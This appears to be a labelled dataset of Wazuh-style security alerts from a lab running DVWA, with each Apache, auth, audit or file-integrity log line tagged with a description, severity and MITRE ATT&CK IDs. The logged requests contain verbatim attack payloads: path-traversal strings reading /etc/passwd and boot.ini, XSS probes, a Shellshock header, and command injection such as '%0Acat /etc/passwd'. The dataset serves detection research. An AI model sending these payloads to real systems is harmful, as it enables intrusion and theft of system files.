source
stringclasses
7 values
full_log
stringlengths
39
5.15k
description
stringclasses
59 values
level
int64
3
15
technique
stringclasses
37 values
tactic
stringclasses
23 values
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:53 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2e%2f%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:49:35 sohaib-virtual-machine sshd[18980]: Accepted password for sohaib from 192.168.204.1 port 65316 ssh2
sshd: authentication success.
3
["T1078","T1021"]
["TA0005","TA0003","TA0004","TA0001","TA0008"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:07 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%252fissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:48:20 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/auth.log
Oct 18 23:46:56 sohaib-virtual-machine sudo: sohaib : TTY=pts/9 ; PWD=/home/sohaib ; USER=root ; COMMAND=/usr/bin/sh -c 'printf "command_start_%s" "Tm6BFeCz"; readlink -e /snap/core20/1974/lib/x86_64-linux-gnu/libcrypto.so.1.1 2>/dev/null; printf "command_done_%s" "Y20w4hlZ"'
Successful sudo to ROOT executed.
3
["T1548.003"]
["TA0004","TA0005"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:06 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%2e%2e%5c%5c%2e%2e%5c%2e%2e%5c%5c%2e%2e%5c%2e%2e%5c%5c%2e%2e%5c%2e%2e%5c%5c%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:26:00 +0500] "GET /DVWA/dvwa/css/login.css HTTP/1.1" 200 1148 "-" "() { ignored; }; echo Content-Type: text/plain ; echo ; echo \"bash_cve_2014_6271_rce Output : $((10+86))\""
Shellshock attack detected
15
["T1068","T1190"]
["TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:47 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2fVolumes%2fMacintosh_HD1%2fopt%2fapache%2fconf%2fhttpd%2econf%00&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple common web attacks from same source ip.
10
["T1055","T1083"]
["TA0005","TA0004","TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:03 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/tmp/apt.data.1VlK9z' modified Mode: realtime Changed attributes: md5,sha1,sha256 Old md5sum was: '50abce98ac40953ccea08f5fc9c55b3e' New md5sum is : '27984e01f58db474962155a869f7dedd' Old sha1sum was: 'bf07591788681b1716eb49d9883e57f1a92934cd' New sha1sum is : '6a7a9affa3b39e7bd0da5eb2b460d02205e07023' Old sha256sum was: 'e8ca5e538f669b5155a059b3b210086bc5563f2940069a040e7f83cd807d250a' New sha256sum is : '0babb8f7ad0b9d04cd133c1d7f05bbd7356f3c97700e56c893b7e185b572f8df'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:38 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cIMG%20onmouseover%3d%22alert('xxs')%22%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/auth.log
Oct 18 23:40:27 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/auth.log
Oct 18 23:50:51 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:19:51 +0500] "GET /DVWA/login.php?Login=%00jdadqq&password=&user_token=8b200124ecd990a2056241cb3415035a&username= HTTP/1.1" 200 1722 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
syscheck
File '/tmp/apt-key-gpghome.7hQCX4gTAk/gpg.1.sh' deleted Mode: realtime
File deleted.
7
["T1070.004","T1485"]
["TA0005","TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:31 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%u2215%2e%2e%u2215etc%u2215passwd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple common web attacks from same source ip.
10
["T1055","T1083"]
["TA0005","TA0004","TA0007"]
syscheck
File '/tmp/go-build2724593589/b149/_pkg_.a' deleted Mode: realtime
File deleted.
7
["T1070.004","T1485"]
["TA0005","TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:01 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2ehtaccess&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:06 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25af%2e%2e%25c0%25afboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:15:44 +0500] "GET /class/ HTTP/1.1" 404 493 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Multiple web server 400 error codes from same source ip.
10
["T1595.002"]
["TA0043"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:12 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%00%2e%c1%af%2e%00%2e%c1%af%2e%00%2e%c1%af%2e%00%2e%c1%afetc%c1%afpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple common web attacks from same source ip.
10
["T1055","T1083"]
["TA0005","TA0004","TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:11 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%00%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:19:52 +0500] "GET /DVWA/login.php?Login=%00jdadqq&password=fJWA0Mwx&user_token=8b200124ecd990a2056241cb3415035a&username= HTTP/1.1" 200 1722 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:12 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:12 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%00%2e%u2215boot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:16 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%01%%32%%66%2e%2e%01%%32%%66%2e%2e%01%%32%%66%2e%2e%01%%32%%66%2e%2e%01%%32%%66%2e%2e%01%%32%%66boot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:12 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%00%2e%u2216%2e%00%2e%u2216%2e%00%2e%u2216%2e%00%2e%u2216etc%u2216issue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:40 +0500] "GET /tiny_mce/plugins/tinybrowser/upload.php?dupfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:28:37 +0500] "GET /DVWA/login.php?Login=Login&password=x%0Acat%20/etc/passwd&password=&user_token=8b200124ecd990a2056241cb3415035a&username=871836 HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:16:29 +0500] "GET /.htaccess.tmp HTTP/1.1" 403 496 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Suspicious URL access.
6
["T1055"]
["TA0005","TA0004"]
syscheck
File '/usr/bin/gold' modified Mode: scheduled Changed attributes: inode,mtime Old modification time was: '1685861380', now it is '1701687470' Old inode was: '273170', now it is '273003'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:42 +0500] "GET /squirrelcart/cart_content.php?cart_isp_root=/etc/passwd%00 HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2f%2e%c1%af%2e%2e%2e%2f%2e%c1%af%2e%2e%2e%2f%2e%c1%af%2e%2e%2e%2f%2e%c1%af%2e%2e%2e%2f%2e%c1%af%2e%2e%2e%2f%2e%c1%afetc%c1%afpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:06 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2e%2e%2f%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:54 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5c%252e%252e%5cboot%2eini%00index%2ehtml&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:57 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c0%afboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/audit/audit.log
type=SYSCALL msg=audit(1704468926.556:3059): arch=c000003e syscall=59 success=yes exit=0 a0=555d97bc0fd0 a1=555d97b8c440 a2=555d97bc2790 a3=7ffde43dbb60 items=2 ppid=4010 pid=4108 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="snap-device-hel" exe="/usr/lib/snapd/snap-device-helper" subj=unconfined key="audit-wazuh-c"ARCH=x86_64 SYSCALL=execve AUID="unset" UID="root" GID="root" EUID="root" SUID="root" FSUID="root" EGID="root" SGID="root" FSGID="root" type=BPRM_FCAPS msg=audit(1704468926.556:3059): fver=0 fp=0 fi=0 fe=0 old_pp=000001f7fdffffff old_pi=0 old_pe=000001f7fdffffff old_pa=0 pp=000001f7fdffffff pi=0 pe=000001f7fdffffff pa=0 frootid=0 type=EXECVE msg=audit(1704468926.556:3059): argc=5 a0="/usr/lib/snapd/snap-device-helper" a1="change" a2="snap_snap-store_ubuntu-software-local-file" a3="/devices/virtual/dma_heap/system" a4="249:0" type=CWD msg=audit(1704468926.556:3059): cwd="/" type=PATH msg=audit(1704468926.556:3059): item=0 name="/usr/lib/snapd/snap-device-helper" inode=287412 dev=08:03 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0OUID="root" OGID="root" type=PATH msg=audit(1704468926.556:3059): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=264289 dev=08:03 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0OUID="root" OGID="root" type=PROCTITLE msg=audit(1704468926.556:3059): proctitle=2F7573722F6C69622F736E6170642F736E61702D6465766963652D68656C706572006368616E676500736E61705F736E61702D73746F72655F7562756E74752D736F6674776172652D6C6F63616C2D66696C65002F646576696365732F7669727475616C2F646D615F686561702F73797374656D003234393A30
Discovery System Architecture via file Command
14
["T1083"]
["TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:14 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%01%252f%2e%2e%01%252f%2e%2e%01%252f%2e%2e%01%252f%2e%2e%01%252fetc%252fissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/tmp/go-build2724593589/b153/_pkg_.a' modified Mode: realtime Changed attributes: size,md5,sha1,sha256 Size changed from '3337252' to '3344198' Old md5sum was: 'faf999be73cd256f5241111ee4ea7070' New md5sum is : '119146fea798875f6f2374d4da905098' Old sha1sum was: '8f826bd47ef28b03649fae182a627fe84512ffca' New sha1sum is : 'a59a05fe29a5f7b787d9d0d4163c7f4017feab73' Old sha256sum was: '243ff6cd001f4f05a6cb282731e7e912bc0971614c421c1523a8d837bc196a64' New sha256sum is : 'e0e67a25007333f8796a54dbed7d190453ea09c963c0fd974b03d90cd2ff8518'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:38 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2f%2e%25c1%259c%2e%2e%2e%2f%2e%25c1%259c%2e%2e%2e%2f%2e%25c1%259c%2e%2e%2e%2f%2e%25c1%259c%2e%2e%2e%2f%2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:54 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cboot%2eini%00index%2ehtml&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:56 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:29:06 +0500] "GET /DVWA/login.php?Login=Login&password=&user_token=%0Aid&user_token=8b200124ecd990a2056241cb3415035a&username=871836 HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:08 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%25c1%259c%2e%2e%25c1%259cetc%25c1%259cpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2f%2e%2e%2e%2f%2e%2e%2e%2f%2e%2e%2e%2f%2e%2e%2e%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:29:34 +0500] "GET /DVWA/login.php?Login=Login&password=E04GH4Og&user_token=%0Acat%20/etc/passwd&username=871836 HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
